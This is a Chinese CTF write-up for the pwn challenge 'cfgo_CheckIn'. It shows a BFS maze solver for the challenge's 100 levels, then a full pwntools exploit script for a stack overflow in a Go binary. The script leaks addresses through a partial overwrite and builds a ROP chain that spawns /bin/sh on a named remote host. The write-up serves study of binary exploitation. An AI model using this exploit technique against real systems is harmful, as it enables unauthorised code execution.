这次比赛的pwn题貌似都不错,本次写下其中cfgo_CheckIn的题解

思路

首先有upx,但是我直接用命令脱壳后发现其实还是不太行,不过好歹可以看代码了。

1
2
3
4
5
6
7
You will get flag when reaching level 100. Now is level 1
⬛⬛⬛⬛⬛⬛
⬛⬛⬛⬛⬛⬛
⬛⬜⬛🚩⬛⬛
⬛⬜⬛⬜⬛⬛
⬛⬜⬜😂⬛⬛
⬛⬛⬛⬛⬛⬛

通过运行我们发现,只有一个输入点,程序让我们走100关的迷宫,然后在输入点我们进行了fuzz测试,发现没啥洞。
那估计就真的是让我们走100关迷宫了。
经过测试,没加一关,迷宫的长跟宽都+1,手走迷宫的思路基本拉闸。

写走迷宫算法

本次算法主要用了广度优先来实现。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
MAX_VALUE = 0x7fffffff

class Point:

def __init__(self, x=0, y=0):

self.x = x

self.y = y


flag_x=[]
flag_y=[]

def bfs(maze, begin, end):

n, m = len(maze), len(maze[0])

dist = [[MAX_VALUE for _ in range(m)] for _ in range(n)]

pre = [[None for _ in range(m)] for _ in range(n)] # 当前点的上一个点,用于输出路径轨迹



dx = [1, 0, -1, 0] # 四个方位

dy = [0, 1, 0, -1]

sx, sy = begin.x, begin.y

gx, gy = end.x, end.y



dist[sx][sy] = 0

queue = deque()

queue.append(begin)

while queue:

curr = queue.popleft()

find = False

for i in range(4):

nx, ny = curr.x + dx[i], curr.y + dy[i]

if 0<=nx<n and 0<=ny<m and maze[nx][ny] != '#' and dist[nx][ny] == MAX_VALUE:

dist[nx][ny] = dist[curr.x][curr.y] + 1

pre[nx][ny] = curr

queue.append(Point(nx, ny))

if nx == gx and ny == gy:

find = True

break

if find:

break



stack = []

curr = end

while True:

stack.append(curr)

if curr.x == begin.x and curr.y == begin.y:

break

prev = pre[curr.x][curr.y]

curr = prev

while stack:

curr = stack.pop()
flag_x.append(curr.x)
flag_y.append(curr.y)

其中的参数为
maze:迷宫的地图(列表)
其中’#’表示墙,’.’表示可走的路,’S’表示起点,’G’表示终点
begin:起点坐标
end:终点坐标
flag_x:存每次走的x坐标
flag_y:存每次走的y坐标
这样我们就可以实现,传入一个迷宫地图与起点终点,输出路径的坐标

制作maze

这里我们接受到i+6个’\n’,并且返回一个列表,将列表变为字符串
这里不使用p.recv()得原因是它得缓冲区只有一个页内存,当数据过大时就接受不全了。

1
2
3
p.recvuntil("Now is level "+str(i+1)+'\n')
source=p.recvlines(i+6)
source='\n'.join(source)

然后我们计算起点到(0,0)的个数,这里由于起点的大小是4个字节,并且最后两个字节是变化的,所以我将所有的变化都捕捉下来,写入判断
(所以代码写的有点奥里给)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#----计算起点到(0,0)的个数
if source.find("\xf0\x9f\x98\x82")!=-1:
orgin=(source.find("\xf0\x9f\x98\x82")-source[0:source.find("\xf0\x9f\x98\x82")].count("\n"))/3
if source.find("\xf0\x9f\x98\x85")!=-1:
orgin=(source.find("\xf0\x9f\x98\x85")-source[0:source.find("\xf0\x9f\x98\x85")].count("\n"))/3
if source.find("\xf0\x9f\x98\x81")!=-1:
orgin=(source.find("\xf0\x9f\x98\x81")-source[0:source.find("\xf0\x9f\x98\x81")].count("\n"))/3
if source.find("\xf0\x9f\x98\x80")!=-1:
orgin=(source.find("\xf0\x9f\x98\x80")-source[0:source.find("\xf0\x9f\x98\x80")].count("\n"))/3
if source.find("\xf0\x9f\x99\x82")!=-1:
orgin=(source.find("\xf0\x9f\x99\x82")-source[0:source.find("\xf0\x9f\x99\x82")].count("\n"))/3
if source.find("\xf0\x9f\x98\x90")!=-1:
orgin=(source.find("\xf0\x9f\x98\x90")-source[0:source.find("\xf0\x9f\x98\x90")].count("\n"))/3
if source.find("\xf0\x9f\x98\x91")!=-1:
orgin=(source.find("\xf0\x9f\x98\x91")-source[0:source.find("\xf0\x9f\x98\x91")].count("\n"))/3
if source.find("\xf0\x9f\x98\xaf")!=-1:
orgin=(source.find("\xf0\x9f\x98\xaf")-source[0:source.find("\xf0\x9f\x98\xaf")].count("\n"))/3
if source.find("\xf0\x9f\x98\x9f")!=-1:
orgin=(source.find("\xf0\x9f\x98\x9f")-source[0:source.find("\xf0\x9f\x98\x9f")].count("\n"))/3
if source.find("\xf0\x9f\x98\x9e")!=-1:
orgin=(source.find("\xf0\x9f\x98\x9e")-source[0:source.find("\xf0\x9f\x98\x9e")].count("\n"))/3
if source.find("\xf0\x9f\x98\x96")!=-1:
orgin=(source.find("\xf0\x9f\x98\x96")-source[0:source.find("\xf0\x9f\x98\x96")].count("\n"))/3
if source.find("\xf0\x9f\x98\xb3")!=-1:
orgin=(source.find("\xf0\x9f\x98\xb3")-source[0:source.find("\xf0\x9f\x98\xb3")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa8")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa8")-source[0:source.find("\xf0\x9f\x98\xa8")].count("\n"))/3
if source.find("\xf0\x9f\x98\xb1")!=-1:
orgin=(source.find("\xf0\x9f\x98\xb1")-source[0:source.find("\xf0\x9f\x98\xb1")].count("\n"))/3
if source.find("\xf0\x9f\x98\xad")!=-1:
orgin=(source.find("\xf0\x9f\x98\xad")-source[0:source.find("\xf0\x9f\x98\xad")].count("\n"))/3
if source.find("\xf0\x9f\x98\xb5")!=-1:
orgin=(source.find("\xf0\x9f\x98\xb5")-source[0:source.find("\xf0\x9f\x98\xb5")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa9")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa9")-source[0:source.find("\xf0\x9f\x98\xa9")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa0")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa0")-source[0:source.find("\xf0\x9f\x98\xa0")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa1")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa1")-source[0:source.find("\xf0\x9f\x98\xa1")].count("\n"))/3
if source.find("\xf0\x9f\x99\x83")!=-1:#---------------
orgin=(source.find("\xf0\x9f\x99\x83")-source[0:source.find("\xf0\x9f\x99\x83")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa4")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa4")-source[0:source.find("\xf0\x9f\x98\xa4")].count("\n"))/3
if source.find("\xf0\x9f\x98\x8f")!=-1:
orgin=(source.find("\xf0\x9f\x98\x8f")-source[0:source.find("\xf0\x9f\x98\x8f")].count("\n"))/3
print "source.find=",source.find("\xf0\x9f\x98\x8f")
print "source.count=",source[0:source.find("\xf0\x9f\x98\x8f")].count("\n")
if source.find("\xf0\x9f\x98\x92")!=-1:
orgin=(source.find("\xf0\x9f\x98\x92")-source[0:source.find("\xf0\x9f\x98\x92")].count("\n"))/3
if source.find("\xf0\x9f\x98\xae")!=-1:
orgin=(source.find("\xf0\x9f\x90\xae")-source[0:source.find("\xf0\x9f\x90\xae")].count("\n"))/3
if source.find("\xf0\x9f\x98\x8f")!=-1:
orgin=(source.find("\xf0\x9f\x98\x8f")-source[0:source.find("\xf0\x9f\x98\x8f")].count("\n"))/3
if source.find("\xf0\x9f\x90\xae")!=-1:
orgin=(source.find("\xf0\x9f\x90\xae")-source[0:source.find("\xf0\x9f\x90\xae")].count("\n"))/3
if source.find("\xf0\x9f\x8d\xba")!=-1:
orgin=(source.find("\xf0\x9f\x8d\xba")-source[0:source.find("\xf0\x9f\x8d\xba")].count("\n"))/3

计算终点到(0,0)的长度

1
final=(source.find("🚩")-source[0:source.find("🚩")].count("\n"))/3

将起点改为’S’,终点改为’G’,路改为’.’,墙壁改为’#’,将字符串改为列表以便满足maze属性。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
source=source.replace("⬛" , '#  ')

source=source.replace("\xf0\x9f\x98\xaf",'S ')
source=source.replace("\xf0\x9f\x98\x91",'S ')
source=source.replace("\xf0\x9f\x98\x90",'S ')
.
.
.
source=source.replace("\xf0\x9f\x98\x8f",'S ')
source=source.replace("\xf0\x9f\x90\xae",'S ')
source=source.replace("\xf0\x9f\x8d\xba",'S ')

source=source.replace("⬜",'. ')
source=source.replace("\n",'\n\n')
migong=source.replace("🚩",'G ')
#-----变为列表
maze = np.array(migong).reshape((x,x))

然后我们还需要得到起点与终点坐标

1
2
3
4
5
begin.x = orgin/x
begin.y = orgin%x

end.x = final/x
end.y = final%x

测试

写个循环,调用bfs(maze, begin, end)就行。
然后我们需要得到路径字符串

1
2
3
4
5
6
7
8
9
10
11
12
flag2=''
for z in range(len(flag_x)-1):
if flag_x[z]-flag_x[z+1]==0:
if flag_y[z]-flag_y[z+1]==1:
flag2+='a'
else:
flag2+='d'
else:
if flag_x[z]-flag_x[z+1]==1:
flag2+='w'
else:
flag2+='s'

这样我们就得到了。我们跑一跑测试一下。

1
2
3
4
5
size-(105, 104)
[*] Switching to interactive mode
You win!!!
Leave your name:
$

What?说好的flag呢,(黑人问号脸)
不过至少说明了我们得方向是对得。

栈溢出

经过测试这个是栈溢出得洞,首先测试偏移
我们使用cyclic打印出300个字节出来,直接打进去

1
2
3
4
5
6
7
8
9
'runtime: unexpected return pc for nArxBHup called from 0x6361617463616173\n'
'stack: frame={sp:0xc000049d28, fp:0xc000049e90} stack=[0xc000049000,0xc00004a000)\n'
'000000c000049c28: 0000000000000000 000000c00009a000 \n'
'000000c000049c38: 000000000000012d 00007f728c221b60 \n'
'000000c000049c48: 000000c000049ce8 00005578eff29307 <j5i9C80CBynqdZfW+2215> \n'
'000000c000049c58: 000000c000049cc8 0000000000000127 \n'
'000000c000049c68: 000000c00009c000 00007f728c221b60 \n'
'000000c000049c78: 0000000000000001 010100000000012c \n'
'000000c000049c88: 0000000000000000 6261616762616166 \n'

通过打印得错误结果我们可以看到,程序进行了不正常得调用,地址为0x6361617463616173
我们使用cyclic -l 0x63616173来得出偏移为272
但是现在得问题是,程序保护是全开的,栈溢出只有一次,那么我们可以想到被覆盖得空间里有猫腻。
通过测试我们发现0x119389是程序执行ret得偏移
偏移为112处有一个函数指针,并且偏移为120的值是不可变的,为下面打印函数得第一个参数
可以打印处其中指针内的值。
下面是112偏移得取值

1
2
3
4
5
6
RSI  0x6261616562616164 ('daabeaab')
0x55cf79fdd747 movdqu xmm0, xmmword ptr [rsi]
0x55cf79fdd74b movdqu xmm1, xmmword ptr [rsi + rbx - 0x10]
0x55cf79fdd751 movdqu xmmword ptr [rdi], xmm0
0x55cf79fdd755 movdqu xmmword ptr [rdi + rbx - 0x10], xmm1
0x55cf79fdd75b ret

现在我们将偏移为112处改为0xc000049af0(里面存有程序地址)
接下来只需要寻找如何让程序返回到函数头
经过测试,我们找到text_addr+0x1190f0处,程序返回。
在这里我们需要爆破半个字节
最终payload

1
/bin/sh\x00"+"a"*104+p64(0xc000049af0)+p64(0x20)+'/bin/sh\x00'+'a'*0x88+'\xf0\xd0'

这些/bin/sh没所谓
如果成功后,我们就能得到程序地址并且重新获得输入
计算基地址

1
text_addr=u64(p.recv(6).ljust(8,"\x00"))-0x32398-0x52000

接下来就简单了,我们需要获取远程libc地址
经过远程测试,远程为libc.2.31,

1
2
3
4
5
.text:00000000000FFE25                 mov     rdi, [rsp+arg_8]
.text:00000000000FFE2A mov rsi, [rsp+arg_10]
.text:00000000000FFE2F mov rdx, [rsp+arg_18]
.text:00000000000FFE34 mov rax, [rsp+arg_0]
.text:00000000000FFE39 syscall

我们可以利用本段来执行execve(‘/bin/sh’,0,0)

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
import numpy as np
from collections import deque
import re
import os

context.arch = 'amd64'
elf = ELF('pwn2')
p = 0
MAX_VALUE = 0x7fffffff

class Point:

def __init__(self, x=0, y=0):

self.x = x

self.y = y


flag_x=[]
flag_y=[]

def bfs(maze, begin, end):

n, m = len(maze), len(maze[0])

dist = [[MAX_VALUE for _ in range(m)] for _ in range(n)]

pre = [[None for _ in range(m)] for _ in range(n)] # 当前点的上一个点,用于输出路径轨迹



dx = [1, 0, -1, 0] # 四个方位

dy = [0, 1, 0, -1]

sx, sy = begin.x, begin.y

gx, gy = end.x, end.y



dist[sx][sy] = 0

queue = deque()

queue.append(begin)

while queue:

curr = queue.popleft()

find = False

for i in range(4):

nx, ny = curr.x + dx[i], curr.y + dy[i]

if 0<=nx<n and 0<=ny<m and maze[nx][ny] != '#' and dist[nx][ny] == MAX_VALUE:

dist[nx][ny] = dist[curr.x][curr.y] + 1

pre[nx][ny] = curr

queue.append(Point(nx, ny))

if nx == gx and ny == gy:

find = True

break

if find:

break



stack = []

curr = end

while True:

stack.append(curr)

if curr.x == begin.x and curr.y == begin.y:

break

prev = pre[curr.x][curr.y]

curr = prev

while stack:

curr = stack.pop()
flag_x.append(curr.x)
flag_y.append(curr.y)



def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./pwn2')

else:
p = remote(ip,port)
for i in range(100):
p.recvuntil("Now is level "+str(i+1)+'\n')
source=p.recvlines(i+6)
source='\n'.join(source)
pattern = re.compile(r"\xf0\x9f..")
result = pattern.findall(source)
#print source
#print result
x=(source.find("\n"))/3
y=source.count("\n")
if source.find("\xf0\x9f\x98\x82")!=-1:
orgin=(source.find("\xf0\x9f\x98\x82")-source[0:source.find("\xf0\x9f\x98\x82")].count("\n"))/3
if source.find("\xf0\x9f\x98\x85")!=-1:
orgin=(source.find("\xf0\x9f\x98\x85")-source[0:source.find("\xf0\x9f\x98\x85")].count("\n"))/3
if source.find("\xf0\x9f\x98\x81")!=-1:
orgin=(source.find("\xf0\x9f\x98\x81")-source[0:source.find("\xf0\x9f\x98\x81")].count("\n"))/3
if source.find("\xf0\x9f\x98\x80")!=-1:
orgin=(source.find("\xf0\x9f\x98\x80")-source[0:source.find("\xf0\x9f\x98\x80")].count("\n"))/3
if source.find("\xf0\x9f\x99\x82")!=-1:
orgin=(source.find("\xf0\x9f\x99\x82")-source[0:source.find("\xf0\x9f\x99\x82")].count("\n"))/3
if source.find("\xf0\x9f\x98\x90")!=-1:
orgin=(source.find("\xf0\x9f\x98\x90")-source[0:source.find("\xf0\x9f\x98\x90")].count("\n"))/3
if source.find("\xf0\x9f\x98\x91")!=-1:
orgin=(source.find("\xf0\x9f\x98\x91")-source[0:source.find("\xf0\x9f\x98\x91")].count("\n"))/3
if source.find("\xf0\x9f\x98\xaf")!=-1:
orgin=(source.find("\xf0\x9f\x98\xaf")-source[0:source.find("\xf0\x9f\x98\xaf")].count("\n"))/3
if source.find("\xf0\x9f\x98\x9f")!=-1:
orgin=(source.find("\xf0\x9f\x98\x9f")-source[0:source.find("\xf0\x9f\x98\x9f")].count("\n"))/3
if source.find("\xf0\x9f\x98\x9e")!=-1:
orgin=(source.find("\xf0\x9f\x98\x9e")-source[0:source.find("\xf0\x9f\x98\x9e")].count("\n"))/3
if source.find("\xf0\x9f\x98\x96")!=-1:
orgin=(source.find("\xf0\x9f\x98\x96")-source[0:source.find("\xf0\x9f\x98\x96")].count("\n"))/3
if source.find("\xf0\x9f\x98\xb3")!=-1:
orgin=(source.find("\xf0\x9f\x98\xb3")-source[0:source.find("\xf0\x9f\x98\xb3")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa8")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa8")-source[0:source.find("\xf0\x9f\x98\xa8")].count("\n"))/3
if source.find("\xf0\x9f\x98\xb1")!=-1:
orgin=(source.find("\xf0\x9f\x98\xb1")-source[0:source.find("\xf0\x9f\x98\xb1")].count("\n"))/3
if source.find("\xf0\x9f\x98\xad")!=-1:
orgin=(source.find("\xf0\x9f\x98\xad")-source[0:source.find("\xf0\x9f\x98\xad")].count("\n"))/3
if source.find("\xf0\x9f\x98\xb5")!=-1:
orgin=(source.find("\xf0\x9f\x98\xb5")-source[0:source.find("\xf0\x9f\x98\xb5")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa9")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa9")-source[0:source.find("\xf0\x9f\x98\xa9")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa0")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa0")-source[0:source.find("\xf0\x9f\x98\xa0")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa1")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa1")-source[0:source.find("\xf0\x9f\x98\xa1")].count("\n"))/3
if source.find("\xf0\x9f\x99\x83")!=-1:#---------------
orgin=(source.find("\xf0\x9f\x99\x83")-source[0:source.find("\xf0\x9f\x99\x83")].count("\n"))/3
if source.find("\xf0\x9f\x98\xa4")!=-1:
orgin=(source.find("\xf0\x9f\x98\xa4")-source[0:source.find("\xf0\x9f\x98\xa4")].count("\n"))/3
if source.find("\xf0\x9f\x98\x8f")!=-1:
orgin=(source.find("\xf0\x9f\x98\x8f")-source[0:source.find("\xf0\x9f\x98\x8f")].count("\n"))/3
print "source.find=",source.find("\xf0\x9f\x98\x8f")
print "source.count=",source[0:source.find("\xf0\x9f\x98\x8f")].count("\n")
if source.find("\xf0\x9f\x98\x92")!=-1:
orgin=(source.find("\xf0\x9f\x98\x92")-source[0:source.find("\xf0\x9f\x98\x92")].count("\n"))/3
if source.find("\xf0\x9f\x98\xae")!=-1:
orgin=(source.find("\xf0\x9f\x90\xae")-source[0:source.find("\xf0\x9f\x90\xae")].count("\n"))/3
if source.find("\xf0\x9f\x98\x8f")!=-1:
orgin=(source.find("\xf0\x9f\x98\x8f")-source[0:source.find("\xf0\x9f\x98\x8f")].count("\n"))/3
if source.find("\xf0\x9f\x90\xae")!=-1:
orgin=(source.find("\xf0\x9f\x90\xae")-source[0:source.find("\xf0\x9f\x90\xae")].count("\n"))/3
if source.find("\xf0\x9f\x8d\xba")!=-1:
orgin=(source.find("\xf0\x9f\x8d\xba")-source[0:source.find("\xf0\x9f\x8d\xba")].count("\n"))/3





final=(source.find("🚩")-source[0:source.find("🚩")].count("\n"))/3
source=source.replace("⬛" , '# ')

source=source.replace("\xf0\x9f\x98\xaf",'S ')
source=source.replace("\xf0\x9f\x98\x91",'S ')
source=source.replace("\xf0\x9f\x98\x90",'S ')
source=source.replace("\xf0\x9f\x99\x82",'S ')
source=source.replace("\xf0\x9f\x98\x80",'S ')
source=source.replace("\xf0\x9f\x98\x81",'S ')
source=source.replace("\xf0\x9f\x98\x82",'S ')
source=source.replace("\xf0\x9f\x98\x85",'S ')
source=source.replace("\xf0\x9f\x98\x9f",'S ')
source=source.replace("\xf0\x9f\x98\x9e",'S ')
source=source.replace("\xf0\x9f\x98\x96",'S ')
source=source.replace("\xf0\x9f\x98\xb3",'S ')
source=source.replace("\xf0\x9f\x98\xa8",'S ')
source=source.replace("\xf0\x9f\x98\xb1",'S ')
source=source.replace("\xf0\x9f\x98\xad",'S ')
source=source.replace("\xf0\x9f\x98\xb5",'S ')
source=source.replace("\xf0\x9f\x98\xa9",'S ')
source=source.replace("\xf0\x9f\x98\xa0",'S ')
source=source.replace("\xf0\x9f\x98\xa1",'S ')#----------
source=source.replace("\xf0\x9f\x98\xa4",'S ')
source=source.replace("\xf0\x9f\x99\x83",'S ')
source=source.replace("\xf0\x9f\x98\x8f",'S ')
source=source.replace("\xf0\x9f\x98\x92",'S ')
source=source.replace("\xf0\x9f\x90\xae",'S ')
source=source.replace("\xf0\x9f\x98\x8f",'S ')
source=source.replace("\xf0\x9f\x90\xae",'S ')
source=source.replace("\xf0\x9f\x8d\xba",'S ')




source=source.replace("⬜",'. ')
source=source.replace("\n",'\n\n')
migong=source.replace("🚩",'G ')
orgin_fin=str((orgin/x))+str(orgin%x)
final_fin=str((final/x))+str(final%x)
migong=migong.split()
if len(migong)<x*x:
for ww in range(x*x-len(migong)):
migong.append("#")
#print "orgin=",orgin
#print "final=",final
print('size-(%d, %d)' % (x, y))
#print('orgin-(%d, %d)' % (orgin/x, orgin%x))
#print('final-(%d, %d)' % (final/x, final%x))
#pause()
maze = np.array(migong).reshape((x,x))
#np.set_printoptions(threshold=np.inf)
#print maze
flag=""
begin = Point()

end = Point()

begin.x = orgin/x
begin.y = orgin%x

end.x = final/x
end.y = final%x
bfs(maze, begin, end)
#print flag_x
#print flag_y


flag2=''
for z in range(len(flag_x)-1):
if flag_x[z]-flag_x[z+1]==0:
if flag_y[z]-flag_y[z+1]==1:
flag2+='a'
else:
flag2+='d'
else:
if flag_x[z]-flag_x[z+1]==1:
flag2+='w'
else:
flag2+='s'
#print flag2
p.sendline(flag2)
flag_x[:]=[]
flag_y[:]=[]
p.recvuntil("Leave your name:\n")
#context.log_level = 'debug'
p.sendline("/bin/sh\x00"+"a"*104+p64(0xc000049af0)+p64(0x20)+'/bin/sh\x00'+'a'*0x88+'\xf0\xd0')#0xc000049e88

p.recvuntil("ame is : ")
text_addr=u64(p.recv(6).ljust(8,"\x00"))-0x32398-0x52000
p.recvuntil("Leave your name:\n")
#gdb.attach(p,"b* $rebase(0x119389)")
p.sendline("/bin/sh\x00"+"a"*104+p64(text_addr+0x1eefd0)+p64(0x20)+'/bin/sh\x00'+'a'*0x88+p64(text_addr+0x1190f0))#0xc000049e88

p.recvuntil("ame is : ")
libc_addr=u64(p.recv(6).ljust(8,"\x00"))
print "libc_addr=",hex(libc_addr)
libc=ELF("./libc.so.6")
libcbase_addr=libc_addr-libc.symbols['__libc_start_main']
system_addr=libcbase_addr+libc.symbols["system"]
#binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
#pop_rdi_ret=libcbase_addr+0x026b72
binsh_addr=libcbase_addr+0x1b75aa
pop_rdi_ret=text_addr+0x109d3d
ret_addr=text_addr+0x72016
print "libcbase_addr=",hex(libcbase_addr)
print "binsh_addr=",hex(binsh_addr)
print "pop_rdi_ret=",hex(pop_rdi_ret)
print "system_addr=",hex(system_addr)
#gdb.attach(p,"b* $rebase(0x119389)")
p.recvuntil("Leave your name:\n")
ROP=p64(ret_addr)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
ROP=p64(text_addr+0xffe25)+p64(0)+p64(59)
ROP+=p64(binsh_addr)+p64(0)+p64(0)
p.sendline(p64(binsh_addr)*14+p64(0xc000049af0)+p64(0x20)+p64(binsh_addr)*18+ROP)#0xc000049e88



p.interactive()
if __name__ == '__main__':
while(1):
try:
pwn('81.68.174.63',62176,1)
except EOFError:
p.close()

总结

这个题还是花了我很长时间的,归到底还是我的算法水平太次,写迷宫花费了太长时间
以后要多学学编程了。。